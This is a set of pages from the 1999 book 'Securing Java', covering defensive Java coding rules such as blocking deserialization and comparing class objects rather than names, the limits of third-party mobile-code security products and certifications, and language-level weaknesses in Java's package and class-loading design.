Rule 10: Make Your Classes Undeserializeable This rule is even more important than the preceding one. Even if your class is not serializeable, it may still be deserializeable. An adversary can create a sequence of bytes that happens to deserialize to an instance of your class. This is dangerous, since you do not have control over what state the deserialized object is in. You can think of deserialization as another kind of public constructor for your object; unfortunately, it is a kind of constructor that is difficult for you to control. You can prevent this kind of attack by making it impossible to deserialize a byte stream into an instance of your class. You can do this by declaring the readObject method: private final void readObject(ObjectInputStream in) throws java.io.IOException { throw new java.io.IOException("Class cannot be deserialized"); }
As in Rule 9, this method is declared final to prevent the adversary from overriding it.
Rule 11: Don't Compare Classes by Name Sometimes you want to compare the classes of two objects to see whether they are the same, or you want to see whether an object has a particular class. When you do this, you need to be aware that there can be multiple classes with the same name in a JVM. It is a mistake to compare classes by name since different classes can have the same name. A better way is to compare class objects for equality directly. For example, given two objects, a and b, if you want to see whether they are the same class, you should use this code: if(a.getClass() == b.getClass()){ // objects have the same class }else{ // objects have different classes }
You should also be on the lookout for cases of less-direct by-name comparisons. Suppose, for example, you want to see whether an object "has the class Foo." Here is the wrong way to do it: if(obj.getClass().getName().equals("Foo")) // objects class is named Foo }else{ // object's class has some other name }
// Wrong!
Here is a better way to do it: if(obj.getClass() == this.getClassLoader().loadClass("Foo")){ // object's class is equal to the class that this class calls "Foo" }else{ // object's class is not equal to the class that // this class calls "Foo" }
Note the legalistic comments in the last example. Whenever you use classnames, you are opening yourself
up to mix-and-match attacks, as described in Rule 7. You should also know that the Java language forces you to use classnames all the time: in variable declarations, instanceof expressions, and exception-catching blocks. Only the designers of Java can prevent mix-and-match attacks, but you can avoid making the problem worse by avoiding by-name class comparisons.
Rule 12: Secrets Stored in Your Code Won't Protect You You might be tempted to store secrets such as cryptographic keys in the code for your application or library. Secrets stored in this way are completely accessible to anyone who runs your code. There is nothing to stop a malicious programmer or virtual machine from looking inside your code and learning its secrets. Code obfuscation is another way to store a secret in your code; in the case of obfuscation, the secret is simply the algorithm used by your code. There's not much harm in using an obfuscator, but you shouldn't believe that it provides strong protection. There is no real evidence that it is possible to obfuscate Java source code or byte code so that a dedicated adversary with good tools cannot reverse the obfuscation.
The Take Home Message Writing secure Java code is very difficult. There is no magic bullet that will solve your security problems; all you can do is think hard (perhaps with help from formal analysis tools) and use prudent engineering practices to minimize risks. Sometimes a pair of objective outside eyes can help. The rules set forth here are intended to describe some prudent engineering practices for writing secure Java code. They won't solve your security problems, but they will reduce the number of ways in which things can go wrong.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs
Next Page
Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Java Security Guidelines Developing and Using Java More Securely
Next Page
Java security is important to Web users, system administrators, Java developers, and business people. Sun Microsystems and others have worked hard to evolve a Java system with which to create and use more secure code. Java is not immune to security risks, however. As we have seen, designing and implementing a language-based security model is not easy, and mistakes are bound to happen. Given that there is no such thing as a 100-percent secure system (at least if we want that system to do anything useful), how can developers create more secure Java code? And, given that Java developers can't always be counted among the good guys, how can Web users tailor their Web use to be more secure? These are the two major questions this chapter answers. We introduce two sets of guidelines in this chapter: developer guidelines for creating more secure Java code and user guidelines for avoiding risks when using Java. By establishing some simple security guidelines, you can avoid most of the risks discussed throughout this book. Many of the user guidelines have been touched on in other chapters. Here they are consolidated in a complete package. On the other hand, the developer guidelines are completely new material.
Chapter Seven Sections 1. Guidelines for Java Developers 2. Guidelines for Java Users 3. Guidelines Are Never Perfect
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Securing Java: Improvements, Solutions, and Snake Oil CHAPTER SECTIONS: 1 / 2 / 3 / 4 /5 / 6 Previous Page
Next Page
Section 6 -- Assess Your Risks
In some sense, the entire purpose of this book is summed up by the phrase "assess your risks." Our goal in writing this book is to make you aware of what is going on with Java security. That way, you can make an intelligent, informed decision about what to do as a user, as a developer, as a manager, or as a business decision-maker. Each organization and individual must create their own strategy for developing, using, and managing Java. The way to do this is to take a long hard look at the risks incurred through Java use. If these risks turn out to be too much to bear, then you should probably reconsider being connected to the Internet itself! Using Java is risky, but really not much more risky than simply being on the Net. Risk assessment involves understanding what it would mean if the data on your machine were made public, what it would mean if your machine were to stop functioning, and what it would mean if the performance of your machine were suddenly and seriously degraded. Risks differ according to context. That means if you have more than one machine (and most organizations do), it is likely that risk assessments for each one differ. An intelligent Java strategy can only be made after understanding what you have to lose. If the answer is "nothing," then there is no reason to worry about Java. If the answer is "the business," then perhaps a more comprehensive Java security policy should be put in place. When you are considering your risks, make sure you don't discount the benefits of Java. Java is an exciting and interesting technology that has lots to offer. Try not to throw out the good with the bad.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Securing Java: Improvements, Solutions, and Snake Oil CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 Previous Page
Section 5 -- Risks That Third-Party Vendors Can't Address
Next Page
It seems that there is indeed room for third-party vendors to get involved in the mobile code security business. However, many mobile code security issues cannot be addressed in a trivial manner. In this section, we raise a number of tricky issues that are harder to deal with than they seem at first. Many of these issues are reflected in the questions to ask from the previous section. Keep these points in mind when you are shopping for mobile code solutions.
Identifying Applets Entering the System As we pointed out in 1996, identifying applets is much harder than simply scanning for the <APPLET> tag in port 80 HTTP traffic. The problem of encrypted communication using something like SSL is especially hard to deal with. (Similar problems crop up with encrypted mail that includes mobile code.) The only completely guaranteed way of identifying all mobile code before it runs is by stopping it as it enters the VM. Your browser certainly knows when it encounters a Java applet, and it is probably in the best position to do something about it. From a management perspective, identifying mobile code at the firewall has more appeal than trying to identify it on every desktop in an organization. This is especially true of organizations in which employees do not follow security policy. However, the problem is nontrivial. Ask hard questions about systems that claim to be able to stop all mobile code. Make sure the answers deal with all ports, multiple protocols, and encrypted connections.
Killing Applets Some vendors will tell you that their products allow the user to kill a running applet if it is misbehaving. Although many people are surprised to hear it, there's really no effective way to kill an applet if the applet doesn't want to die. The problem is that the only way to kill a Java thread is to throw an Exception at it, and the thread can simply catch the Exception. See page 125. You might think that this problem can be solved by creating a new kind of Exception that cannot be caught, but that won't solve the problem either. The difficulty is that the try/finally statement in the Java language allows a program to do an arbitrary amount of "cleanup" work before it finishes running. In fact, the "cleanup" code can simply carry on the work of the thread you wanted to kill. An even stronger way to try killing an applet is simply to stop all of the applet's threads, not even letting them execute their cleanup code. This doesn't work either, in general, because the stopped threads may be holding locks, and the VM may be unable to make progress without the locks. Revoking the locks while the victim threads are in the middle of using them only makes things worse, leaving the VM in a potentially inconsistent state. This gets pretty complicated, but the bottom line is that there's no way to safely kill a thread that doesn't want to die. And if an applet thread is trying to cause trouble, why would it willingly let you kill it? Of course, you can stop all running applets by killing the VM or browser entirely, but that's a pretty drastic solution, and you don't need some fancy tool to let you do it.
Scanning Applets Java has important dynamic properties. Because of Java's dynamic loading capabilities, it is not possible to statically analyze a Java class completely. Some analysis will always have to be put off until runtime. The fact that the Verifier has a runtime phase is no accident (see Chapter 2). Java's dynamic capabilities do not bode well for systems that claim to be able to scan applets for potentially harmful behavior. After all, if the code is not all there (or if it includes dangling references to not-yet-loaded code), how can you scan it? Static analysis is not sufficient to ensure security, and short of firing up a VM, that's all you can do. Another problem is that scanning works according to the assumption that attack code can be categorized as such. We have seen (or written) plenty of attack code in the lab. It is not the case that this code can be identified as attack code before it does its dirty work. For example, one of the attacks described in Chapter 5 can be written as an applet that carries out seemingly innocuous type-casting operations, one after another. The casting actually implements the important part of a type-confusion attack. Looking at the
code, it would be impossible to tell that the applet is an attack applet. Many of the malicious applets written as demonstrations use very obvious techniques to carry out their hostile activities. For example, early denial-of-service or monitoring applets redefined the stop() method. This does not mean that every applet that redefines stop is malicious, nor does it mean that each and every attack applet will do so. Scanning for unknown malicious behavior is a very difficult task that is certainly impossible in theory.
Trusted Dialogs and Meters Providing security-related feedback to a user is a good thing, as long as the information is correct. However, if a meter can be spoofed, you can bet that a hostile applet will do so. The spoofing problem may be severe enough that it is best not to have meters. This may in fact be why Sun, Netscape, and Microsoft do not include such feedback mechanisms in their implementations. Ask yourself why you should trust a meter and how you can ensure that it is giving you the correct information. Improving the VM's Security Model In the end, the most bang for the buck in terms of security will come from Sun and the Java licensees who create the VMs and APIs. Compared to creating a complete VM with added security mechanisms, improving the security situation by adding on minor services is probably nowhere near as effective.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved.
Published by John Wiley & Sons, Inc.
Securing Java: Improvements, Solutions, and Snake Oil CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 Previous Page
Section 4 -- Risks That Third-Party Vendors Can Address
Next Page
As we mentioned in the previous section, there are a number of Java security needs that third-party vendors can help to address. We discuss such needs here and also raise some hard questions that you should ask vendors of such products if you're considering buying them. Perhaps counterintuitively, some concerns included in this section are also covered in the next, which discusses risks that can't be easily addressed. That's because the issues are complicated and can be seen equally well from both points of view.
Logging For a discussion of why logging is important, see page 194. The Java platform in most browsers does not do an adequate job of logging mobile code. This is an area in which third-party software can add real value. However, logging is actually trickier than it might appear at first blush.
What to Ask about Logging The main thing to ask of any logging capability is, how well protected is the log file from being overwritten, corrupted, or deleted? Attackers often cover their tracks by editing log files. Attack applets of the sort we discussed in Chapter 5 could certainly change logs if they wanted to. Accuracy is also a big issue for log files. It is important that logs collect proper data and can't be easily mislead by a malicious process. If vendors say that their products log all incoming byte code, you should ask how they can be sure. This is roughly the same issue we describe next when we talk about applet isolation. After all, if code can slip past
your firewall, how can you be sure it can't slip past the logging facility?
Applet Isolation (and Identification) A common approach to security for many companies includes the installation of sacrificial lamb machines in a DMZ (terminology borrowed from military speak). Things like Web servers and FTP servers are wellsituated in DMZs because they are common targets of attack with many well-known and commonly exploited security holes. The idea is to create a subnetwork behind the firewall but isolated from the rest of your network. That way, if the servers are hacked, your site is still not completely compromised. Isolating untrusted code to a server in the DMZ may be a good idea, depending on your mobile code risk analysis. If mobile code turns out to be hostile and aims an attack at the server it is running on, much less is lost if the server is a sacrificial lamb in the DMZ. Some third-party solutions offer this capability.
What to Ask about Applet Isolation One interesting question to ask vendors of isolation products is, how well do they identify applets in the first place? It turns out that trapping all applets is not an easy problem. Early approaches relying on scanning port 80 traffic for the <APPLET> tag have been shown to be inadequate (something we mentioned in 1996). One of the most thorough treatments of this issue can be found in a paper called Blocking Java Applets at the Firewall [Martin, et al., 1997]. The paper points out problems with standard blocking methods and discusses the technical difficulties of blocking. Another hard question for vendors involves the use of encrypted channels for mobile code delivery. Most browsers have built-in capability to create an SSL connection between the Web server and the client browser (see Chapter 3). Once an SSL connection exists, all traffic between the browser and the server is encrypted. That means a firewall will not be able to parse the traffic as it goes by. What a firewall can't see, it certainly can't identify. Ask vendors what they do about encrypted communication in their identification approach. If they can't scan SSL traffic, they're in trouble because an attacker can defeat their scanner by changing http to https in the attack page's URL.
Black Listing The idea of creating a list of applets known to be hostile seems like a really good idea. The key is to identify hostile applets by something less easy to change than their name or the URL from which they came. Some systems use hashing algorithms like MD5 to create a database of applets on a black list. Others offer the ability to black list entire Web servers.
Assuming applets can be identified in the first place, black listing will work. One problem is that it is almost trivial to make a hostile applet that changes its own byte code (in a very simple way) each time it is requested from a server. Mark LaDue's HAMGen applet does this. See http://www.rstcorp.com/hostileapplets/Rube/HAMGen.java. HAMGen stands for Hostile Applet Mutation Generator.
What to Ask about Black Listing It should be clear that black listing by itself does not provide adequate security; in fact, all by itself, black listing is darn close to useless. It's too easy to make trivial changes in a malicious applet (a process that can be automated at the Web server end) to thwart almost every black-listing scheme. Nevertheless, black listing is so cheap to implement that it may make sense to do it anyway, especially if you enlist the help of a Class Loader. Using a system that blacklists known hostile code may be worthwhile even if it only stops the occasional naïve attack.
Trusted Dialogs and Meters We discussed trusted dialogs and meters earlier in this chapter on page 198. Such dialogs are particularly useful to managers whose policy involves having users keep an eye out for unusual activity. They are also useful to more savvy users who know about mobile code. The problem with most VMs today is that they give no indication that anything special is happening when mobile code is running, be it Java, JavaScript, or ActiveX. The behind-the-scenes approach gives the user a more seamless Web experience, but it makes the job of writing a hostile piece of mobile code that much easier. There is a downside to providing dialogs and meters-the user can become overwhelmed with securityrelated dialogs leading to the "cry wolf" phenomenon. It's easy to click OK over and over, especially when you're annoyed. Trusted meters and dialogs would best be as nonintrusive as possible.
What to Ask about Trusted Dialogs and Meters A particularly hard question to ask is, how can dialogs and meters avoid the spoofing problem? In other words, how can you be sure that the "meter" you see on the screen is real and isn't really being drawn by a hostile applet? If these things can't be trusted to tell you the truth, then they're not worth the pixels they're made of. Turns out this problem is a tough one. A nontrustworthy meter is potentially worse than no meter at all.
Platform Proliferation
One of the most successful Java marketing phrases is "write once, run anywhere." A number of parodies of this phrase have been floated; among the best is "write once, test everywhere." The problem is that all Java VMs don't always do the same thing given the same byte code. Arbitrary behavior of similar code in different versions of a language is a problem that Java was supposed to solve. This problem can introduce real security risks. Consider, for example, that the attacks described in Chapter 5 still work against old versions of browsers out there. Unless you have an up-to-date browser, you may be surfing dangerously. Now imagine that you are the administrator for a large site with hundreds of users. How likely is it that all your users are using up-to-date browsers? How likely is it that they're even using browsers from a single vendor? Some sites address this problem by mandating the use of a particular (often out-dated) browser; however, impatient power users will download their own free browser and install it themselves. Using a move that mirrors the Applet Isolation idea discussed previously, it is possible to address this risk by forcing all applets to run on a central server. That way, you can guarantee things about the environment in which mobile code will run.
What to Ask about Centralized Server Solutions A big issue for all centralized systems is scalability. How many users can bog down a central server before it chokes? How big a server do you need? What protocol is used to direct GUI traffic between the server and the clients running on normal browsers? How well protected is that protocol against simple denial-ofservice attacks? And given the difficulties in detecting incoming applets, how can you be sure that all applets are being redirected to the central server?
Policy Management Finally, we come around to policy management again. Given the state of existing tools, there should be some serious demand for good policy management systems. Note that the management issue is not unique to security. Managing large networks of many machines is a daunting task, and the tools are not yet good enough. Consider the problem of keeping all the software on hundreds of PCs up to date. To some extent this is a problem introduced by the complications of distributed systems. Security in merely one aspect of this broader management problem.
What to Ask about Policy Management Policy management is as much a business management problem as it is a technological problem. Human factors enter the picture, such as, who is allowed to set policy and who can edit it? An excellent goal to strive for is to put in place a site-wide security policy that speaks to all security issues. Much work remains to be done.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Securing Java: Improvements, Solutions, and Snake Oil CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 Previous Page
Section 3 -- Third-Party Solutions or Snake Oil?
Next Page
Sun Microsystems and the licensees of Java who have created particular Virtual Machines have done an admirable job implementing a complex, language-based security model. Of course no one is perfect. We discuss several serious problems in detail in Chapter 5. In light of the problems detailed there (a majority of which have been addressed as Java has grown up), is there a need for third-party Java security vendors? The answer is complicated. On one hand, if Sun and the other major vendors (including the largest software organizations on the planet) can't do it right, how can someone else? One answer is that Sun is too busy working on the entire Java platform to pay enough attention to security concerns and that little companies specializing in security can do better. Just for the record, we don't believe that is true. Sun and the other Java vendors behave in a manner that shows they are truly concerned with security issues. On the other hand, different organizations have different goals for their security solutions. Some may demand features that are not included in off-the-shelf Java VMs. The implication is that special-purpose solutions that address particular risks are needed. If that's true, there should be plenty of room in the market for thirdparty security vendors to get involved. As long as such third-party vendors concentrate on mitigating particular risks, their products will add value. However, many such vendors are making overblown claims about what they can do to enhance security. In this section, we want to clarify which risks can reasonably be addressed by these vendors and which cannot. In order to set the stage for a discussion of risks, we'll begin with a brief introduction to security solutions that have been offered by third-party organizations.
Finjan In the interest of full disclosure, we should note that both authors are members of Finjan's Technical Advisory Board. Our membership on Finjan's TAB does not constitute an endorsement of the company or its products. Originally based in Israel and now headquartered in California, Finjan Software, Ltd. was among the first third-party companies to address mobile code security issues (www.finjan.com). Finjan got off to a rough start when some of its early marketing involved the use of scare tactics and what might be called the "Chicken Little" approach to educating the public (and potential clients) about security risks. Its approach to marketing has since matured significantly. Finjan offers a couple of products created for both Win32 and Unix platforms. The first, SurfinShield, is meant to be a browser-level application firewall. The idea is to add some capabilities to the browser to help with mobile code management. SurfinShield comes in several flavors. The second product, SurfinGate, is a firewall product that attempts to identify and categorize mobile code as it arrives at the firewall. SurfinGate carries out some form of content inspection that attempts to peer into the inner workings of Java applets (statically). SurfinCheck is a less-powerful version of SurfinGate. Finjan has had an interesting time in the mobile code security space and has been the target of some particularly scathing criticism. Mark LaDue is especially outspoken about his concerns (see www.rstcorp.com/hostile-applets/rube.html and www.rstcorp.com/hostile-applets/drowning.html). Fortunately, Finjan has taken these criticisms to heart and seems to be working diligently to provide better security products to its customers.
Digitivity (Citrix) Digitivity, the commercial arm of APM, Ltd. in Cambridge, England, was recently acquired by Citrix. The Digitivity approach to mobile code management is particularly sound from a technical perspective. The idea is to identify and route all mobile code to a central server, where it is then executed. This works because all GUI traffic is sent (by specialized protocol) to be displayed on the client browser that originally requested the code. There are two main reasons to centralize the execution of code like this: 1) to expose only the server, what Digitivity calls the CAGE, to possible attack; and 2) to better manage the behavior of mobile code by knowing the exact configuration of the mobile code platform. As we know, different Java VMs behave differently even when they are running the same byte code. If you know for certain which VM a piece of code will run on, it is easier to develop and manage custom enterprise solutions. There is an inescapable irony to the Digitivity CAGE model. The very idea that spawned mobile code systems like Java is the idea of taking advantage of distributed systems by running code on client
machines instead of running code on something like a centralized Web server. The CAGE model centralizes Java code and works counter to the original Java concept. Still, there are sometimes appealing reasons to centralize the execution of code, whether it is potentially dangerous or not. It is not clear how the CAGE approach will adapt to the new Java 2 security model. The main strength of the CAGE approach is that the mobile code runs on a special machine that simply is not allowed to access user files or initiate network connections under any circumstances. As soon as partially privileged applets enter the picture, this simple approach goes out the window and the CAGE machine faces many of the same problems as existing VMs.
Security7 Security7 is an Israeli company with offices in the United States. U.S. sales for Security7 are based in Woburn, Massachusetts. The Security7 approach to mobile code security is to inspect HTTP traffic coming in on all ports. Its SafeGate product requires Windows NT and is most effectively implemented on a standalone box that acts as a proxy server for all HTTP traffic. The idea is to enhance the existing firewall approach with the HTTP filtering system, which is built in to the OS as a device driver. The SafeGate product includes the usual mobile code management capabilities and logging. It appears that Security7 has been active in spreading FUD (fear, uncertainty, and doubt) among potential customers through an organization called WithinReach. This strategy is reminiscent of the early days of the antivirus industry in which some unscrupulous vendors were rumored to have created and released actual viruses. These days, a code of ethics has been developed within the antivirus community that does not permit the FUD strategy. Unscrupulous antivirus vendors are quickly stamped out by more scrupulous vendors. It is pretty obvious that Security7 and WithinReach are closely affiliated (in fact, Security7 has openly admitted this). Assaf Arkin, a Security7 customer support manager, is also the administrative and technical contact listed in the DNS records of WithinReach. Other evidence includes the fact that one of the hostile applets hosted by WithinReach was signed with a digital certificate registered to Richard Kosinski, Security7's vice president of marketing. The signature has since been changed. InfoWorld broke a story about the relationship between Security7 and WithinReach in late August 1998. Until recently, the WithinReach site hosted a number of hostile applets, including a port of the Cult of the Dead Cow's famous Back Orifice loader to Java. None of the applets on the site exploits any security holes in Java; instead, the applets require permission to be granted by the user in order to do anything harmful. That is, the applets are signed and request special permission to step outside of the sandbox. The applets thus serve to emphasize the role that a human can play in mobile code security. In this sense, the WithinReach applets may provide an interesting service. Nevertheless, we do not believe that it is ethical for third-party security vendors to create security problems for their products to address. Fortunately,
Security7 seems to share our opinion now, and the WithinReach Hostiles have been removed.
eSafe eSafe is a Seattle-based company that also happens to be founded by an Israeli. eSafe offers two products: Protect, a personal firewall, and Protect Gateway, a firewall-level filtering system. Protect works by placing resource limitations on mobile code. The idea is to create a sandbox similar to the Java sandbox within which all mobile code must run. The Protect Gateway product is a filter meant to be added to an existing firewall that scans several protocols for mobile code. The filter includes blacklisting capability. eSafe products also include antivirus capability in addition to addressing mobile code security.
The Princeton Secure Internet Programming Team's JavaFilter The Princeton team distributes a black-listing/white-listing Class Loader for JDK 1.0.2 that can automatically allow or disallow applets to be loaded from particular sites. The filter replaces Java's normal AppletClassLoader with a new implementation that checks URLs and policy before fetching code. Although this is not a commercial product, it is certainly a third-party add-on that some organizations may find useful. See www.cs.princeton.edu/sip/JavaFilter for more information.
ICSA's Mobile Code Security Consortium Regardless of its misleading name, the International Computer Security Association is a for-profit business that licenses the use of trademarked "certification" logos. (Perhaps its name is a perfect example of spoofing?!) ICSA was known as NCSA until 1998 when it changed its name from "National" to "International." As part of its business, ICSA creates consortia of security vendors interested in particular issues. The consortia exist to hash out self-imposed certification criteria that can be used as a marketing edge by vendors. ICSA's business strategy is to get vendors to pay to be in a consortium (in which vendors create certification criteria) and then pay to be certified on a subscription basis. Consumer purchasing decisions are often swayed, for whatever reason, by ICSA certification marks. One of ICSA's best-known certification products involves certifying firewalls. The firewall certification system makes an interesting case study. As we understand it, ICSA's firewall certification process boils down to running a penetration test against one instance of a firewall product as configured according to printed instructions from the firewall vendor. If a firewall product passes the tests, the vendor is allowed to place an ICSA certification stamp on its box (and use it in its marketing literature).
A potentially fatal flaw in this firewall certification scheme is that firewalls are not really black-box systems; instead, they are programmable systems that are only as strong as the rules within them defining security policy. Rules in a typical firewall say things like "only allow machines having an IP address within the proper range to send HTTP traffic through port 80." The flaw in the ICSA certification scheme becomes obvious considering that what is being certified is a particular configuration of a firewall. The problem is that firewalls are particularly easy to misconfigure, and the certification scheme says nothing about how difficult it is for an end user of a firewall to configure it correctly. Firewall purchasers may be misled into thinking that buying an ICSA-certified firewall guarantees some minimum level of security. That is not the case. For a stark view of the ICSA firewall certification process, see firewall guru Marcus Ranum's page at www.clark.net/pub/mjr/pubs/fwtest/index.htm. On the flip side of the coin, the firewall certification process that ICSA offers is said to be a discriminator; that is, some firewall products are unable to pass the security tests even when configured according to the instructions! So the certification has at least that benefit to offer. We raise the firewall certification issue because ICSA recently announced the formation of a consortium meant to address mobile code security. Current members of the consortium include Digitivity, eSafe, Finjan, Internet Security Systems, Security7, and Symantec (among others). Strikingly, the major vendors of security-critical platforms for mobile code (Sun, Netscape, and Microsoft) are missing from the list. The question raised earlier in this chapter about what third-party vendors can offer (as opposed to the platform architects) comes to mind. It is likely that the mobile code consortium will choose to invent a set of self-imposed standards (a certification process) for itself. The question to ask is, what will this certification amount to? Developing a certification standard for the mobile code consortium is no easy task if it is to be done properly. Without external review by experts, a mobile code security certification may not actually mean anything. It is our hope that ICSA will take the opportunity to do things right.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help
Next Page
Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Securing Java: Improvements, Solutions, and Snake Oil CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 Previous Page
Section 2 -- Writing Safer Code: A Defensive Stance
Next Page
It is all well and good to look to the future and determine what might make a platform stronger, but developers and managers charged with using existing JDKs won't benefit immediately from this strategy. Are there things developers can do now to make their Java code more secure? Fortunately, the answer is yes. Chapter 7 introduces 12 technical guidelines for writing Java code more securely. Also covered in Chapter 7 are user guidelines.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved.
Published by John Wiley & Sons, Inc.
Securing Java: Improvements, Solutions, and Snake Oil CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 Previous Page
Next Page
Section 1 -- Improving the Platform
Most problems discussed in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance," and Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," involve specific vulnerabilities that have more to do with the current implementation of Java than with the Java security model itself. There are, however, some general concerns raised by the computer security community regarding Java. Many of these concerns are not new; in fact, we wrote about a majority of these issues in 1996. We discuss what progress has been made since then (if any). This section discusses some of these concerns and how addressing them would improve Java security.
Language Issues The first group of issues has to do with the design of Java itself. There are a handful of main language issues to discuss. Note that these are criticisms of the language itself and not criticisms of the current implementation. It may be too late to address these concerns now that the Java ball has been rolling for a couple of years, but these issues still warrant discussion.
Public Variables First among the language concerns is the fact that Java allows a kind of variable called a public variable. These variables can be overwritten by a method from any Java class, no matter where the class may have been defined or from where that class may have been loaded. Storing any data in a public variable introduces a security risk. Public variables are still writable across namespaces. This means that a public variable can be overwritten by an applet that has come across the network. The global nature of public variables opens an entire
avenue of attacks.
Protected Variables A similar concern is raised by protected variables and classes. The real problem is that the label protected implies more security than it may actually offer. Protected variables and classes can be accessed by the class that created them, the creator's subclasses, and classes in the same Java package. Packages are a bit peculiar in Java (something we discuss later in this chapter). The result is that code can declare itself part of a package and gain access to protected variables. Developers should be aware of this risk and use protected variables sparingly.
Packages A third language issue involves Java's package mechanism. Basically, packages in Java are too weak. A variable or method can be declared as accessible to classes within the current package, but there is no alternative way to control what sorts of other classes can access the variable. It would be better to have more explicit control over who can access variables. The flexibility to choose two of these classes, those four, and one from that other package to make up a new package would make the modularity mechanism much more versatile. Consider the following: The java.io.File class is dangerous, and untrusted applets have no business accessing it. However, the same File class is required by code in java.lang.ClassLoader in order for the Class Loader to load classes from the local disk. Since java.io.File is needed outside its package, it must be declared public, making it accessible to applets. But making it public introduces a serious security hole. The hole can be plugged by adding a few rules (some code) to the Security Manager (or the Access Controller, as the case may be). As these parts are built by the browser vendor (or some other Java application writer), such a solution is generally not very reasonable. It would be better to have some way for java.io.File to be accessible to the java.io and java.lang packages, but not to any other code. Doing this would create a stronger package system in Java. In addition, the way membership in a package is declared is somewhat strange in Java. Most languages with package-like modularity use a single file for each module, outlining which code is in the module and who is allowed to access the module. The owner of a module can then easily control who is allowed to use code and variables in the module. In Java, there is no single declaration of a module or a list of members having access to the module. Instead, each class itself declares which package it belongs to. That means that an external mechanism (such as the Security Manager or the Access Controller) must decide whether partially trusted code should be allowed to declare itself a member of a particular package. Because the package system is more complex than it needs to be, there is more room for error than with a more typical setup.
Byte Code Representation
The next programming language critique is more abstract: Java's byte code specification is not optimal. As an intermediate representation between the Java source and the machine code of the platform on which Java runs, byte code plays an important role. We believe there are better ways to represent the same sort of platform-independent code. One construct, called Abstract Syntax Trees (AST), would be easier to type check than existing Java byte code. ASTs would greatly simplify global dataflow analysis, which would speed up the Verifier and reduce the odds of a Verifier bug. That's because the current Verifier must painstakingly deduce information that ASTs have built directly into them. ASTs also have the same semantics as the source languages they represent. That means there is no need to question whether the intermediate representation is more powerful than the source language. By contrast, Java byte code semantics are different from Java source code semantics. Who can guarantee that Java byte code is constrained in similar ways to the Java language itself? If you're at a loss imagining why that matters, consider that some aspects of Java security depend on Java's semantics and not on byte code semantics. Does that mean it may be possible to do things directly in byte code that a Java compiler would, for security reasons (or other good reasons), not allow? Unfortunately, the answer is yes. For details on this issue, see page 196. In any event, since ASTs have a compilation speed (source to AST) comparable to byte code compilation speed (source to byte code), why not use ASTs? These and other language issues are discussed in greater detail in the Secure Internet Programming team's early paper, "Java Security: From HotJava to Netscape and Beyond" [Dean et al., 1996]. If you are interested in learning more about such things, the article is available on the Web at www.cs.princeton.edu/sip/pub/secure96.html.
Dynamic Class Loading Class loading has always been a problematic issue for Java. In fact, even though class loading has been redesigned and supposedly fixed in every successive JDK, each implementation has included at least one serious security flaw. A recent Java security hole, discovered in a beta version of Java 2 in 1998, was yet another problem with class loading (see Chapter 5 for details). In Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," where class loaders are introduced and discussed in some detail, we point out that there are really two functions performed by class loaders: 1. locating and fetching byte code 2. managing namespaces. There is no reason these two capabilities need to be combined into a single class. In fact, some of Java's more serious security holes could have been avoided if class-loading architecture had initially separated the two functions. The culprit in many security problems has been in defining the namespaces seen by
different classes and how the namespaces relate to each other. As the approach to class loading has changed throughout Java's short life, class loading has mutated from a completely extensible architecture (which was dangerous from a security perspective), to a system in which only trusted code could create a Class Loader, and back to a system in which untrusted code might once again be able to safely create a Class Loader (that is, if it follows a stringent set of rules). If you decide to create a Class Loader of your own, it is best to change only those aspects of class loading related to locating and fetching byte code. Avoid changing the namespace structure if at all possible. For more on the complications of class loading and how to fix them, see Drew Dean's doctoral thesis [Dean, 1998]. As we said before, class loading is a perfect example with which to counter claims that Java's security problems are all related to superficial implementation bugs.
